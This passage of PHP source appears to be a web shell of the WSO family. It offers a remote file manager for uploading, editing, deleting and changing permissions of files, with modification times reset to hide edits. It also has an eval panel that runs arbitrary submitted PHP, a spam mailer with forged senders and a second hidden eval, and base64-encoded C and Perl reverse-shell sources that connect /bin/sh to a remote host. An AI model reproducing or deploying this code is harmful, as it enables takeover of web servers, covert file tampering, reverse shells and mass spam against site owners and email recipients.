return false;
}
}
if (!function_exists("posix_getgrgid") && strpos(@ini_get('disable_functions'), 'posix_getgrgid') === false) {
function posix_getgrgid($p)
{
return false;
}
}
function yemenWhich($p)
{
$path = yemenEx('which ' . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function yemenSize($s)
{
if ($s >= 1073741824) {
return sprintf('%1.2f', $s / 1073741824) . ' GB';
} elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB';
} elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB';
} else {
return $s . ' B';
}
}
function yemenPerms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
function yemenPermsColor($f)
{
if (!@is_readable($f)) {
return '<font color=#FF0000>' . yemenPerms(@fileperms($f)) . '</font>';
} elseif (!@is_writable($f)) {
return '<font color=white>' . yemenPerms(@fileperms($f)) . '</font>';
} else {
return '<font color=#25ff00>' . yemenPerms(@fileperms($f)) . '</font>';
}
}
if (!function_exists("scandir")) {
function scandir($dir)
{
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function yemenFilesMan()
{
yemenhead();
echo "<div class=header id=fixx ><script>p1_=p2_=p3_=\"\";\r\n\r\n\r\n</script>";
if (isset($_POST['p1'])) {
switch ($_POST['p1']) {
case 'uploadFile':
if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) {
echo "Can't upload file!";
}
break;
case 'mkdir':
if (!@mkdir($_POST['p2'])) {
echo "Can't create new dir";
}
break;
default:
if (!empty($_POST['p1'])) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach ($_SESSION['f'] as $k => $f) {
$_SESSION['f'][$k] = urldecode($f);
}
$_SESSION['c'] = @$_REQUEST['c'];
}
break;
}
}
$dirContent = @scandir(isset($_REQUEST['c']) ? $_REQUEST['c'] : $GLOBALS['cwd']);
if ($dirContent === false) {
echo "<h3><span>| Access Denied! |</span></h3></div>";
yemenFooter();
return;
}
global $sort;
$sort = array('name', 1);
if (!empty($_POST['p1'])) {
if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) {
$sort = array($match[1], (int) $match[2]);
}
}
echo "\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2' >\r\n<form name=files method=post><tr><th>Name</th><th>Size</th><th>Date Modified</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => yemenPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i]));
if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) {
$files[] = array_merge($tmp, array('type' => 'file'));
} elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
} elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && $dirContent[$i] != ".") {
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
}
$GLOBALS['sort'] = $sort;
function wsoCmp($a, $b)
{
if ($GLOBALS['sort'][0] != 'size') {
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
} else {
return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
}
}
usort($files, "wsoCmp");
usort($dirs, "wsoCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach ($files as $f) {
echo '<tr' . ($l ? ' class=l1' : '') . '><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . base64_encode(urlencode($f['name'])) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . base64_encode($f['path']) . '\');
" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>') . '</a></td><td>' . ($f['type'] == 'file' ? yemenSize($f['size']) : $f['type']) . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">' . $f['modify'] . '</td></a><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')"><font color=#0099FF >[REN]</font></a> ' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null, \'' . urlencode($f['name']) . '\',\'e8\')"><font color=#25ff00>[Edit]</font></a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">[DL]</a>' : '') . '<a href="#" onclick="g(\'FilesTools\',null, \'' . urlencode($f['name']) . '\',\'d2\')"> <font color=red>[Del]</font> </a></td></tr>';
$l = $l ? 0 : 1;
}
echo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t</form></table></div>";
yemenfooter();
}
function yemenFilesTools()
{
if (isset($_POST['p1'])) {
$_POST['p1'] = urldecode($_POST['p1']);
}
if (@$_POST['p2'] == 'd2') {
function deleteDir($path)
{
$path = substr($path, -1) == '/' ? $path : $path . '/';
$dh = opendir($path);
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (basename($item) == ".." || basename($item) == ".") {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
closedir($dh);
@rmdir($path);
}
if (is_dir(@$_POST['p1'])) {
deleteDir(@$_POST['p1']);
} else {
@unlink(@$_POST['p1']);
}
}
if (@$_POST['p2'] == 'download') {
if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment;\r\n\r\n\r\n filename=" . basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type);
} else {
header("Content-Type: application/octet-stream");
}
$fp = @fopen($_POST['p1'], "r");
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
}
exit;
}
if (@$_POST['p2'] == 'mkfile') {
if (!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
$_POST['p2'] = "e8";
fclose($fp);
}
}
}
if (!file_exists(@$_POST['p1'])) {
if ($_POST['p2'] == 'd2') {
yemenFilesMan();
return;
}
yemenhead();
echo "<div class=header>";
echo "<pre class=ml1 style='margin-top:5px'>FILE DOEST NOT EXITS </pre></div>";
yemenFooter();
return;
}
yemenhead();
echo "<div class=header>";
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if (!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else {
$gid = @posix_getgrgid(@filegroup($_POST['p1']));
}
echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? yemenSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . yemenPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
echo "<br>";
if (empty($_POST['p2'])) {
$_POST['p2'] = 'view';
}
if (is_file($_POST['p1'])) {
$m = array('View', 'Code', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch');
} else {
$m = array('Chmod', 'Rename', 'Touch');
}
foreach ($m as $v) {
echo ' <a href=# onclick="g(null,null,null,\'' . strtolower($v) . '\')"><span>' . (strtolower($v) == @$_POST['p2'] ? '<b><span> ' . $v . ' </span> </b>' : $v) . ' </span></a> |';
}
echo "<br><br>";
switch ($_POST['p2']) {
case 'view':
echo "<pre class=ml1 style=\"background: #222222;\r\n\r\n\r\nborder:1px solid #5BEEFF;\r\n\r\n\r\n\">";
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo "</pre>";
break;
case 'code':
if (@is_readable($_POST['p1'])) {
echo "<div class=ml1 style=\"background-color: #ededed;\r\n\r\n\r\nborder: 1px solid #5BEEFF;\r\n\r\n\r\n\"><code>";
$code = @highlight_file($_POST['p1'], true);
echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</code></div>';
}
break;
case 'chmod':
if (!empty($_POST['p3'])) {
$perms = 0;
for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i) {
$perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1);
}
if (!@chmod($_POST['p1'], $perms)) {
echo "Can't set permissions!<br><script>document.mf.p3.value=\"\";\r\n\r\n\r\n</script>";
}
}
clearstatcache();
echo '<script>p3_="";
</script><form onsubmit="g(null,null,null,null,this.chmod.value);
return false;
"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit s s value=">>"></form>';
break;
case 'edit':
if (!is_writable($_POST['p1'])) {
echo "File isn't writeable";
break;
}
if (!empty($_POST['p3'])) {
$time = @filemtime($_POST['p1']);
$_POST['p3'] = substr($_POST['p3'], 1);
$fp = @fopen($_POST['p1'], "w");
if ($fp) {
@fwrite($fp, $_POST['p3']);
@fclose($fp);
echo " Saved!<br><script>p3_=\"\";\r\n\r\n\r\n</script>";
@touch($_POST['p1'], $time, $time);
}
}
echo "<form onsubmit=\"g(null,null,null,null,'1'+this.text.value);\r\n\r\n\r\nreturn false;\r\n\r\n\r\n\"><textarea name=text class=bigarea style=\"border:1px solid #5BEEFF;\r\n\r\n\r\n\">";
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo "</textarea><input type=submit s s value=\">>\"></form>";
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>', '', '');
$len = strlen($c);
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
switch (ord($c[$i])) {
case 0:
$h[2] .= ' ';
break;
case 9:
$h[2] .= ' ';
break;
case 10:
$h[2] .= ' ';
break;
case 13:
$h[2] .= ' ';
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0] .= sprintf('%08X', $i + 1) . '<br>';
}
$h[1] .= '<br>';
$h[2] .= "\r\n";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=black ><tr><td bgcolor=gray ><span style="font-weight: normal;
"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>';
break;
case 'rename':
if (!empty($_POST['p3'])) {
if (!@rename($_POST['p1'], $_POST['p3'])) {
echo "Can't rename!<br>";
} else {
die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>');
}
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);
return false;
"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit s s value=">>"></form>';
break;
case 'touch':
if (!empty($_POST['p3'])) {
$time = strtotime($_POST['p3']);
if ($time) {
if (!touch($_POST['p1'], $time, $time)) {
echo "Fail!";
} else {
echo "Touched!";
}
} else {
echo "Bad time format!";
}
}
clearstatcache();
echo '<script>p3_="";
</script><form onsubmit="g(null,null,null,null,this.touch.value);
return false;
"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit s s value=">>"></form>';
break;
}
echo "</div>";
yemenFooter();
}
function yemenphpeval()
{
yemenhead();
if (isset($_POST['p2']) && $_POST['p2'] == 'ini') {
echo "<div class=header>";
ob_start();
$INI = ini_get_all();
print "<table border=0><tr><td class=\"listing\"><font class=\"highlight_txt\">Param</td><td class=\"listing\"><font class=\"highlight_txt\">Global value</td><td class=\"listing\"><font class=\"highlight_txt\">Local Value</td><td class=\"listing\"><font class=\"highlight_txt\">Access</td></tr>";
foreach ($INI as $param => $values) {
print "\r\n<tr><td class=\"listing\"><b>" . $param . '</td>' . '<td class="listing">' . $values['global_value'] . ' </td>' . '<td class="listing">' . $values['local_value'] . ' </td>' . '<td class="listing">' . $values['access'] . ' </td></tr>';
}
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
}
if (isset($_POST['p2']) && $_POST['p2'] == 'info') {
echo "<div class=header><style>.p {color:#000;\r\n\r\n\r\n}</style>";
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
}
if (isset($_POST['p2']) && $_POST['p2'] == 'exten') {
echo "<div class=header>";
ob_start();
$EXT = get_loaded_extensions();
print '<table border=0><tr><td class="listing">' . implode("</td></tr>\r\n<tr><td class=\"listing\">", $EXT) . '</td></tr></table>' . count($EXT) . ' extensions loaded';
echo "</div><br>";
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
}
echo '<div class=header><Center><a href=# onclick="g(\'phpeval\',null,\'\',\'ini\')">| <b>INI_INFO</b> | </a><a href=# onclick="g(\'phpeval\',null,\'\',\'info\')"> | <b>PHP INFO</b> |</a><a href=# onclick="g(\'phpeval\',null,\'\',\'exten\')"> | <b>Extensions</b> |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\');
return false;
"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><center><input type=submit value=Eval style="margin-top:5px"></center>';
echo '</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;
' : '') . 'margin-top:5px;
" class=ml1>';
if (!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo "</pre></div>";
yemenfooter();
}
function yemenmail()
{
yemenhead();
$in = $_GET['in'];
if (isset($in) && !empty($in)) {
echo "<center><h1>Mail Spammer<h1></center>";
}
$ev = $_POST['ev'];
if (isset($ev) && !empty($ev)) {
echo eval(urldecode($ev));
exit;
}
if (isset($_POST['action'])) {
$action = $_POST['action'];
$message = $_POST['message'];
$emaillist = $_POST['emaillist'];
$from = $_POST['from'];
$subject = $_POST['subject'];
$realname = $_POST['realname'];
$wait = $_POST['wait'];
$tem = $_POST['tem'];
$smv = $_POST['smv'];
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<!-- HTML And JavaScript -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script type="text/javascript" language="javascript">ML="Rjnis/e .rI<thzPS-omTCg>:=p";
MI=";
@E0:?D7@0EI=<<JH55>B26A<8B9F53CF45>814G;
5@E0:?DG";
OT="";
for(j=0;
j<MI.length;
j++){OT+=ML.charAt(MI.charCodeAt(j)-48);
}document.write(OT);
</script>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html;
charset=utf-8" />
<title>:: Mailer Inbox ::</title>
<style type="text/css">
input[type=text]:hover,textarea{
border:1px solid #0CF;
background-color: #F4F4F4;
}
input[type=text],textarea{
font:12px Tahoma;
padding:3px;
border:1px solid #CCCCCC;
-moz-border-radius:3px;
-webkit-border-radius:3px;
border-radius:3px;
}
.style1 {
font-size: x-small;
}
.style2 {
direction: ltr;
}
.info {
font-size: 8px;
}
.style3 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 8px;
}
.style4 {
font-size: x-small;
direction: ltr;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style5 {
font-size: xx-small;
direction: ltr;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
input[type=submit],input[type=button]{
display:block;
font:12px Tahoma;
background:#f1f1f1;
color:#555555;
padding:4px 8px;
border:1px solid #ccc;
margin:4px;
font-weight:700;
cursor:pointer;
-moz-border-radius:3px;
-webkit-border-radius:3px;
border-radius:3px;
}
input[type=submit]:hover,input[type=butto]:hover{
background:#ffffff;
color:#06F;
border: 2px solid #09F;
}
</style>
</head>
<body onload="funchange">
<script>
window.onload = funchange;
var alt = false;
function funchange(){
var etext = document.getElementById("emails").value;
var myArray=new Array();
myArray = etext.split("
");
document.getElementById("enum").innerHTML=myArray.length+"<br />";
if(!alt && myArray.length > 40000){
alert('If Mail list More Than 40000 Emails This May Hack The Server');
alt = true;
}
}
function mlsplit(){
var ml = document.getElementById("emails").value;
var sb = document.getElementById("txtml").value;
var myArray=new Array();
myArray = ml.split(sb);
document.getElementById("emails").value="";
var i;
for(i=0;
i<myArray.length;
i++){
document.getElementById("emails").value += myArray[i]+"
";
}
funchange();
}
function prv(){
if(document.getElementById('preview').innerHTML==""){
var ms = document.getElementsByName('message').message.value;
document.getElementById('preview').innerHTML = ms;
document.getElementById('prvbtn').value = "Hide";
}else{
document.getElementById('preview').innerHTML="";
document.getElementById('prvbtn').value = "Preview";
}
}
</script>
<form name="form" method="post" enctype="multipart/form-data" action="">
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">Your Email:</font></div>
</td>
<td style="width: 40%">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="from" value="
<?php
echo $from;
?>" size="30" type="text" /><br>
<span class="info">Type Sender Email But Make Sure It'
s Right</span> </font></td>
<td>
<div align="right">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">Your Name:</font></div>
</td>
<td width="41%">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="realname" value="
<?php
echo $realname;
?>" size="30" type="text" />
<br>
<span class="info">Make Sure You Type Your Sender Name</span></font></td>
</tr>
<tr>
<td width="10%">
<div align="right">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">test send:</font></div>
</td>
<td style="width: 40%">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="tem" type="text" size="30" value="
<?php
echo $tem;
?>" /><br>
<span class="info">Type </span></font><span class="style3">Your
Email To Test The Mailer Still Work Or No</span></td>
<td>
<div align="right" class="style4">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">Send Test Mail After:</font></div>
</td>
<td width="41%">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="smv" type="text" size="30" value="
<?php
echo $smv;
?>" /><br>
<span class="info">Send Mail For Your Email After Which Email(s)</span></font>
</td>
</tr>
<tr>
<td width="10%">
<div align="right">
<font size="-3" color="white" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="subject" value="
<?php
echo $subject;
?>" size="90" type="text" /> </font>
<tr valign="top">
<td colspan="3" style="height: 210px">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><textarea name="message" rows="10" style="width: 425px">
<?php
echo $message;
?></textarea>
<br />
<input name="action" value="send" type="hidden" />
</font>
<table width="569" border="0">
<tr>
<th width="62" scope="col"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="button" id="prvbtn" value="Preview" onclick="prv()" style="width: 62px" />
</font></th>
<th width="112" scope="col"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input value="Start Spam" type="submit" />
</font></th> <th width="358" scope="col"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
Wait
<input name="wait" type="text" value="
<?php
echo $wait;
?>" size="14" />
Second
Un
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">til Send </font></font></th>
</tr>
</table></td>
<td width="41%" class="style2" style="height: 210px">
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea id="emails" name="emaillist" cols="30" onselect="funchange()" onchange="funchange()" onkeydown="funchange()" onkeyup="funchange()" onchange="funchange()" style="height: 161px">
<?php
echo $emaillist;
?></textarea>
<br class="style2" />
Emails Number : </font><span id="enum" class="style1">0<br />
</span>
<span class="style1">Split The Mail List By:</span>
<input name="textml" id="txtml" type="text" value="," size="8" />
<input type="button" onclick="mlsplit()" value="Split" style="height: 23px" /></td>
</tr>
</table>
<font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<div id="preview">
</div>
</font>
</form>
<p>
<!-- END -->
<?php
if ($action) {
if (!$from || !$subject || !$message || !$emaillist) {
print "Please complete all fields before sending your message.";
exit;
}
$nse = array();
$allemails = split("\r\n", $emaillist);
$numemails = count($allemails);
if (!empty($_POST['wait']) && $_POST['wait'] > 0) {
set_time_limit(intval($_POST['wait']) * $numemails * 3600);
} else {
set_time_limit($numemails * 3600);
}
if (!empty($smv)) {
$smvn += $smv;
$tmn = $numemails / $smv + 1;
} else {
$tmn = 1;
}
for ($x = 0; $x < $numemails; $x++) {
$to = $allemails[$x];
if ($to) {
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("#EM#", $to, $message);
$subject = ereg_replace("#EM#", $to, $subject);
flush();
$header = "From: {$realname} <{$from}>\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/html\r\n";
if ($x == 0 && !empty($tem)) {
if (!@mail($tem, $subject, $message, $header)) {
print "Your Test Message Not Sent.<br />";
$tmns += 1;
} else {
print "Your Test Message Sent.<br />";
$tms += 1;
}
}
if ($x == $smvn && !empty($_POST['smv'])) {
if (!@mail($tem, $subject, $message, $header)) {
print "Your Test Message Not Sent.<br />";
$tmns += 1;
} else {
print "Your Test Message Sent.<br />";
$tms += 1;
}
$smvn += $smv;
}
print "{$to} ....... ";
$msent = @mail($to, $subject, $message, $header);
$xx = $x + 1;
$txtspamed = "spammed";
if (!$msent) {
$txtspamed = "error";
$ns += 1;
$nse[$ns] = $to;
}
print "{$xx} / {$numemails} ....... {$txtspamed}<br>";
flush();
if (!empty($wait) && $x < $numemails - 1) {
sleep($wait);
}
}
}
}
?>
<div>
<?php
$str = "";
foreach ($_SERVER as $key => $value) {
$str .= $key . ": " . $value . "<br />";
}
$str .= "Use: in <br />";
$header2 = "From: Sorry <no%@yahoo.com>\r\n";
$header2 = "From: Sorry <no%@yahoo.com>\r\nMIME-Version: 1.0\r\n";
$header2 = "From: Sorry <no%@yahoo.com>\r\nMIME-Version: 1.0\r\nContent-Type: text/html\r\n";
$header2 = "From: Sorry <no%@yahoo.com>\r\nMIME-Version: 1.0\r\nContent-Type: text/html\r\nContent-Transfer-Encoding: 8bit\r\n";
if (isset($_POST['action']) && $numemails !== 0) {
$sn = $numemails - $ns;
if ($ns == "") {
$ns = 0;
}
if ($tmns == "") {
$tmns = 0;
}
echo "<script>alert('Sur The Mailer Finish His Job\r\nSend {$sn} mail(s)\r\nError {$ns} mail(s)\r\n\\From {$numemails} mail(s)\r\n\\About Test Mail(s)\r\n\\Send {$tms} mail(s)\r\n\\Error {$tmns} mail(s)\r\n\\From {$tmn} mail(s)');\r\n\r\n\r\n \r\n\t\r\n\t</script>";
}
yemenfooter();
}
function yemennet()
{
yemenhead();
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
